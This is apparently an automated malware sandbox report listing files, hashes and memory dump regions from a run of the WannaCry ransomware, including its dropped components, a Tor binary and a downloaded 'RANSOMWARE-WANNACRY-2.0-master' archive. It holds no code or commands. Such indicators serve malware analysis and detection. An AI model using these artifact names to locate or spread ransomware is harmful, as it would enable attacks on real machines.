C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\3e4591c5-34f2-40c5-b207-e82720ccb5c0\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
120B

MD5
f56801392307ff54c003d199ca7eade1

SHA1
5e60c43ff6b8b27ff652ce200fe40ba8ea40c959

SHA256
b9edc0818eb18963a921d48e242d4b03c32a69825b1000ba952d386ced4be78b

SHA512
c6755daefda08af396289d13c8a8ec1772d684aaf58df2357ee4f1efc3c2ac34a40b53bc2702bef527edd75b3d0e5757756cca9a1742c7a6346929cd86369580

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
56B

MD5
ae1bccd6831ebfe5ad03b482ee266e4f

SHA1
01f4179f48f1af383b275d7ee338dd160b6f558a

SHA256
1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649

SHA512
baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
119B

MD5
e27b61596491badcbd5f92c5061dc4c6

SHA1
e166906eed55cbc3f4e77ef769ba583b9efd69e3

SHA256
dc09a6126766f97b09d3fbd146a9aa1861bc21cc8468238f1042012b96d0e907

SHA512
cf6d5a23d8021b3437f3ba6503d04ad8da9b8aa27476e363e4dd42c5d48d1cfd2ef6e907e1735140ab79895aa4849eb0df46552288ba913c27d83be1bc4cee47

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
178B

MD5
505cd159cfc240f9d4041ccfe2304d4e

SHA1
fa5aaa96acce58ee2635d178b976ebd2c377926f

SHA256
e52c4165ab5f99b9d8812037def49ee463ef69ff498f486434bf60beeff27c0d

SHA512
15b87927f02200b32b00d06d1740ec2272c3abce40b83c72135f651d3060f742b54843088c7aa1f4f578dfdf7b06f7dbe017239f96ffc1d713d1c409dc577a9d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
178B

MD5
d5bede60e9ded4548e456f45cb55c451

SHA1
cba7d58880596f5df259461bf36a120f19b429a9

SHA256
4762a635229b963e3e2b01222ac0c7f744e676475d5c3b008b428db3ed9126a2

SHA512
0fea30c0ead93c4aa88053790d8d3f42fc03f02470ad4d9c91cfb2eea4a3aad51aca4ffa929fc37368c19415eee6252c9e9c8b5018640cf177b1cbceaae2ab07

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
114B

MD5
f7a12ac0667be958f2e40a12a1987ecc

SHA1
f03affd5b7e6b60af18ecf74e84edf03d2e152d3

SHA256
ed4de2956ee226e3a78045929949b9a6543fda45a1f858288b83c649b5b29a75

SHA512
f3103625e958dd5ad47a8c1797d25704d0c138f9abcfa9acb45ce120fdef0900f1b5d40602c14bcbed10d6278f451e987a5d12ec75e08c3efda779fdb20f1466

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
114B

MD5
668a3d37936dfa259e659c7b46aceb3d

SHA1
bec1b6bad5d96869e41d515effc8b9b0d7b97ecf

SHA256
1a0f86c2965128a41c7ac826a509421074cf5129e12e804be6a888da701bb476

SHA512
7a0cd3896c4c6e6fc6151410638e30530139931f65951ba7d5c5c50bd68fa248d4afa9a53072882f64fe50dc001cc5c851f7664fc04ca77f1ac0cd0c63aef528

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
176B

MD5
221bcd46e46cd4d5ad7b8487ed2f8d58

SHA1
1d17a8bf900efb25af3e166ec64015f0c2514207

SHA256
dc2092530b124b4a285cfeeb7f383a08973ff57fc0769cc59c72d60bb2a71c0c

SHA512
c079ece5153ece6d0b800d84b508e8a4df9c8128a8c21759a9da3d0957789ac04fdd29d76ca3e619cb631b6905a0f29a92fb4a3aeac7c881c65da6d75bc8cb92

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
112B

MD5
adf359f20965c369fb2dcb46a178d18a

SHA1
5cb426416da5aa68d20182f44f4c0457200d0f0f

SHA256
7041e4a7c7d6f0ce38bbd9be76947311719e4337e5cb81c7ff339038780d448b

SHA512
a52cb3a0db028d9d1eb63b3688b472a28a272acd9ea7980d88256a2902aa6bf563aa8508385bf892bc055386a91873ab7fa71208eb6511909befbb8a19e88162

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
f1dd7c1bf76277a9bde74d1ac5c44b56

SHA1
c1965c77de9970a59427bd6fb97413c4f8db92fa

SHA256
a4233a9ee09d9b0e14a8459057152a11a16fd3e26e9c0c14ab2cb57f1138bf33

SHA512
2a7dc07264c1b8670ab00d641020b4da1f7c10b8c7c504e1eef7875d9a9f763e13d1dfe19479942a8a8d6b4d8ad7f173a6cac29ada2a3cc428b764fc1b5ab67e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
48B

MD5
2d19a3f6b2e17f34f998556f20e86604

SHA1
957b30aadb2412636999c3152c3d85e826b425f3

SHA256
ad8b78a124fbe1626dce637800da9cdced56428415537b3e23b66ad8aef9c8f1

SHA512
1913cc8e53bd244c60c5d6c0c5ebcb052309fd0648283caa3b662d1fc38d338e7a0ac38eb96e3abba6396840f973fa9026984345fc072c0d767116bfcce1e807

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57bb51.TMP

Filesize
48B

MD5
a5053e7a5b5a47decabd176435ae467b

SHA1
e1a8bb784ff101dbc1a97979d5caa0fb91357704

SHA256
b5c7f4f3c54a457851da488f69b663bc5d07953bca932ba8f502572065c6059a

SHA512
2875cd4b7a8eff807275e519d3c0c9c8dab664a389ac04ed3ef1984cc29076da2f8c117ae0360b76d8204de73cc25a8ed6d9c917dc146f3ca112edd416c803da

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir2068_1469774728\Shortcuts Menu Icons\Monochrome\0\512.png

Filesize
2KB

MD5
12a429f9782bcff446dc1089b68d44ee

SHA1
e41e5a1a4f2950a7f2da8be77ca26a66da7093b9

SHA256
e1d7407b07c40b5436d78db1077a16fbf75d49e32f3cbd01187b5eaaa10f1e37

SHA512
1da99c5278a589972a1d711d694890f4fd4ec4e56f83781ab9dee91ba99530a7f90d969588fa24dce24b094a28bdecbea80328cee862031a8b289f3e4f38ce7a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir2068_1469774728\Shortcuts Menu Icons\Monochrome\1\512.png

Filesize
10KB

MD5
7f57c509f12aaae2c269646db7fde6e8

SHA1
969d8c0e3d9140f843f36ccf2974b112ad7afc07

SHA256
1d5c9f67fe93f9fcc1a1b61ebc35bda8f98f1261e5005ae37af71f42aab1d90f

SHA512
3503a0f4939bed9e1fd5e086b17d6de1063220dffdab2d2373aa9582a2454a9d8f18c1be74442f4e597bdba796d2d69220bd9e6be632a15367225b804187ea18

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir2068_635250305\Icons Monochrome\16.png

Filesize
216B

MD5
a4fd4f5953721f7f3a5b4bfd58922efe

SHA1
f3abed41d764efbd26bacf84c42bd8098a14c5cb

SHA256
c659d57841bb33d63f7b1334200548f207340d95e8e2ae25aac7a798a08071a3

SHA512
7fcc1ca4d6d97335e76faa65b7cfb381fb722210041bdcd3b31b0f94e15dc226eec4639547af86ae71f311f52a956dc83294c2d23f345e63b5e45e25956b2691

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\eb65a4e7-e3d3-4c38-81b1-5a7686fdd0aa.tmp

Filesize
8KB

MD5
c172180ed2767749490e3dceb01384a6

SHA1
c1d8f1dc4745d8fae6d03bbbabeb26553be85b97

SHA256
da9d7b56f5702d093318df716ee8f2e39de62a1f4831d90390cfe6690f8093d5

SHA512
208087d9d1b042c2f2b149bde8bfc8380d925032c7ad284962fd994f724f25c701356806607903d550413e53ab889741179bfb5293eda3e22b61eb542a0ee282

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
270KB

MD5
9392592c43ed0681023ef75a3103cebe

SHA1
c8955c0719a4799b19cdb693fb3c76c22ff31c77

SHA256
edb9d1fbb3bbcfe25dcd40a0d66245537b6c85a13907a786454b2aec3a152cf3

SHA512
7a6856a8e0d6d75bc3e88b7b531a826069ac0bfa3ef030eecb31b1d6df20d03d7b125db925b426dfaf4836fd53071e44f3e7c22c990ebe4aaccd342a7429c6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
270KB

MD5
6de084790bb2f4e1771f5ddb86786ce9

SHA1
5f1e058133956849b90b934b326a7b4c4e2c6a5c

SHA256
cf126b863cd365835464815491358e7bb88ee138b209b07472342ea18695c99d

SHA512
31c383309e7f84c378b6f11af580dbaadc6401e5f3955de90c6198bdc5319f7a82ca1542b84aeb1fc23671f82f39ab7dc838ec703a2836cde8fde8fa1b55022e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
83KB

MD5
02ced2545d3025888b68a8dd546d40d9

SHA1
8ee767792c868ba06e709461cbe8fe4a0803b357

SHA256
506ad9e4116532ed83476dfefc3c3e2c767c836ac2bd3a78ad96a3fea17c3da4

SHA512
49903e841f3835ab1b5344466524a7c0a0d7c8aec3f04e387e58d587816cbe01725caabd47caf9d2f01a899826c0f02bf4c5ae95e7e0e57606cb5c7429b35d01

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
95KB

MD5
d1c8f517d9a05f38600ed96e63df37db

SHA1
3930ff70fd6e941f93084e8b9ac42af1af0e7280

SHA256
6ec32d38509ef6c19079559c62a14a8ded22bcbe2f228a80f0768a511e933303

SHA512
75839e7c9c08f718d414638fa22862ce413e6dbcb98c8a781f5bfc5e2a3dcf1f1420e15ce9e0f3de65b147c0d5cd60f30574e921071bcf6a03f89c21448c6550

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe597872.TMP

Filesize
83KB

MD5
039b8c434f93fb84db76783821f2f745

SHA1
ca3f3efba543ee86a70a7d3cf2db5d67249e92cc

SHA256
4863d8784a8d4964801ea85ff64e62de6dc53807ef8dbeaa6edff94f51bcd4c8

SHA512
f8e39aa77adfc349848d603d160c1042c8e004cecff0cffd6ce7370eca41c5f860b2eba1dec7f225537822e7b139e4a0e4ff8476d1a0af416ddc48cc7dc87e0c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
5249e3d8ee0da53ba8cf01fe25e054b4

SHA1
1008341066b618e41a5567cb85e233e6a1af03f7

SHA256
c47b779963cbed46cdaa036b01cd1c18d2cae049a6550bfcac53d0d4889af04a

SHA512
2841c855b9f420b213ac42d8bc1853e2b373612c70937669e5cc7eccbbc297196cc16f94e9e1629d7d69843eb588621108e2d03162439cf32a7e7a9629008d06

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\r6lt1pc6.default-release\activity-stream.discovery_stream.json.tmp

Filesize
24KB

MD5
6543e3060da9df92314c224b3811eabf

SHA1
5a769d0f452588136aa1ce7b22ec1e1bca0c0ec0

SHA256
b2fb226a217de3abb2ba1472b343b04dcf908f0ad158d9ca4217961912030592

SHA512
7426077c36d3746db3a5a357bd724ccd61c58f7aa54dead3dbea556611d185aa63fda2ca58905be4c2a2001aa742fe654fb902f103232eda43a1432054854a0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]

Filesize
933B

MD5
7a2726bb6e6a79fb1d092b7f2b688af0

SHA1
b3effadce8b76aee8cd6ce2eccbb8701797468a2

SHA256
840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5

SHA512
4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\b.wnry

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\c.wnry

Filesize
780B

MD5
8124a611153cd3aceb85a7ac58eaa25d

SHA1
c1d5cd8774261d810dca9b6a8e478d01cd4995d6

SHA256
0ceb451c1dbefaa8231eeb462e8ce639863eb5b8ae4fa63a353eb6e86173119e

SHA512
b9c8dfb5d58c95628528cc729d2394367c5e205328645ca6ef78a3552d9ad9f824ae20611a43a6e01daaffeffdc9094f80d772620c731e4192eb0835b8ed0f17

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\r6lt1pc6.default-release\prefs-1.js

Filesize
6KB

MD5
b045e574c04160d2365a28fcae8564d8

SHA1
5fea1fd0f8c4222420caf32644c670d99fb9a899

SHA256
f76b87e86bfd38c33c07af0768b29d17f676582ded913d8574ab76bef4867689

SHA512
769e5968a194bcd08673fcdc20b70a4b9bb872daa61a82b142910befe5ebee0979de4cd8458770d416d271cebc34b6e62d58a4db99cef35e9ba1a7f4b5a44dfb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\r6lt1pc6.default-release\sessionstore.jsonlz4

Filesize
941B

MD5
b8a641f6147775ccbb3ae5388b42fd9a

SHA1
8208e7222e31948b28f100effa33330b204fa329

SHA256
0ce9bb5e1975ddc8f94925d1d895e98026324a87f3acf7614d119205973b1c59

SHA512
28c3db41818e97f9fe7d1af294be585ce0d6cffe91a616504ef37cacb6d69f41ee1084b6a6e83ec9781ddc0b5894487fc6f7c4b18638765b0362e8dc24724f3f

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
11.4MB

MD5
48c4fd2809468a672f8e45ce62146a57

SHA1
51df00c1ae164b19ab8f5ebcc5f0757ddfa04fbd

SHA256
b9c26a9fed9cb486b71287acc15e1638d11177abf517e038ba93dc2523459fc1

SHA512
8984c9a671153a54e3d19ea8843298e126add731166950bdc8cfb3c55595cfd3321e83f1618e2f5a0c733a398a323a2a439784b1d85566e34cbcbc897b762e53

Download Submit
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master.zip.crdownload

Filesize
3.3MB

MD5
017f199a7a5f1e090e10bbd3e9c885ca

SHA1
4e545b77d1be2445b2f0163ab2d6f2f01ec4ca05

SHA256
761e037ee186880d5f7d1f112b839818056f160a9ba60c7fb8d23d926ac0621f

SHA512
76215a26588204247027dcfdab4ea583443b2b2873ff92ad7dd5e9a9037c77d20ab4e471b8dd83e642d8481f53dbc0f83f993548dc7d151dead48dc29c1fdc22

Download Submit
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master.zip:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\@[email protected]

Filesize
1KB

MD5
d74a6cb10d789a3dfe06f24fcc2f12d7

SHA1
a0e7151d6ddc3ffa8f2daeaef9762d688ca752f4

SHA256
7134c08e21a8664028a00474c0b2a7643533d717874d1392663645ddca9bd028

SHA512
72f8cfed9113129465c0c9bd17efe9ff28a012484057f82716c2d3b1d4c5a52261a44606019cf4e5caf0cdddf8bbbbf9d88aeaf9e39494d2215aee1683f98cbc

Download Submit
\??\pipe\crashpad_2068_HWSSIBYIPLWNEXQH

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2672-1952-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/2844-3163-0x0000000073760000-0x00000000737D7000-memory.dmp

Filesize
476KB

Download
memory/2844-3206-0x0000000073460000-0x000000007367C000-memory.dmp

Filesize
2.1MB

Download
memory/2844-3166-0x0000000073680000-0x0000000073702000-memory.dmp

Filesize
520KB

Download
memory/2844-3165-0x0000000073710000-0x0000000073732000-memory.dmp

Filesize
136KB

Download
memory/2844-3164-0x0000000073740000-0x000000007375C000-memory.dmp

Filesize
112KB

Download
memory/2844-3158-0x0000000000300000-0x00000000005FE000-memory.dmp

Filesize
3.0MB

Download
memory/2844-3161-0x0000000000300000-0x00000000005FE000-memory.dmp

Filesize
3.0MB

Download
memory/2844-3167-0x0000000073460000-0x000000007367C000-memory.dmp

Filesize
2.1MB

Download
memory/2844-3169-0x0000000000300000-0x00000000005FE000-memory.dmp

Filesize
3.0MB

Download
memory/2844-3156-0x0000000073680000-0x0000000073702000-memory.dmp

Filesize
520KB

Download
memory/2844-3200-0x0000000000300000-0x00000000005FE000-memory.dmp

Filesize
3.0MB

Download
memory/2844-3248-0x0000000000300000-0x00000000005FE000-memory.dmp

Filesize
3.0MB

Download
memory/2844-3220-0x0000000000300000-0x00000000005FE000-memory.dmp

Filesize
3.0MB

Download
memory/2844-3226-0x0000000073460000-0x000000007367C000-memory.dmp

Filesize
2.1MB

Download
memory/2844-3154-0x00000000737E0000-0x0000000073862000-memory.dmp

Filesize
520KB

Download
memory/2844-3162-0x00000000737E0000-0x0000000073862000-memory.dmp

Filesize
520KB

Download
memory/2844-3155-0x0000000073460000-0x000000007367C000-memory.dmp

Filesize
2.1MB

Download
memory/2844-3297-0x0000000000300000-0x00000000005FE000-memory.dmp

Filesize
3.0MB

Download
memory/2844-3157-0x0000000073710000-0x0000000073732000-memory.dmp

Filesize
136KB

Download
memory/2844-3303-0x0000000073460000-0x000000007367C000-memory.dmp

Filesize
2.1MB

Download
memory/4880-0-0x0000000000BC0000-0x0000000000BEA000-memory.dmp

Filesize
168KB

Download
memory/5380-3228-0x00007FFD83450000-0x00007FFD83460000-memory.dmp

Filesize
64KB

Download
memory/5380-3291-0x00007FFD83450000-0x00007FFD83460000-memory.dmp

Filesize
64KB

Download
memory/5380-3292-0x00007FFD83450000-0x00007FFD83460000-memory.dmp

Filesize
64KB

Download
memory/5380-3294-0x00007FFD83450000-0x00007FFD83460000-memory.dmp

Filesize
64KB

Download
memory/5380-3293-0x00007FFD83450000-0x00007FFD83460000-memory.dmp

Filesize
64KB

Download
memory/5380-3233-0x00007FFD80950000-0x00007FFD80960000-memory.dmp

Filesize
64KB

Download
memory/5380-3232-0x00007FFD80950000-0x00007FFD80960000-memory.dmp

Filesize
64KB

Download
memory/5380-3231-0x00007FFD83450000-0x00007FFD83460000-memory.dmp

Filesize
64KB

Download
memory/5380-3230-0x00007FFD83450000-0x00007FFD83460000-memory.dmp

Filesize
64KB

Download
memory/5380-3229-0x00007FFD83450000-0x00007FFD83460000-memory.dmp

Filesize
64KB

Download
memory/5380-3227-0x00007FFD83450000-0x00007FFD83460000-memory.dmp

Filesize
64KB

Download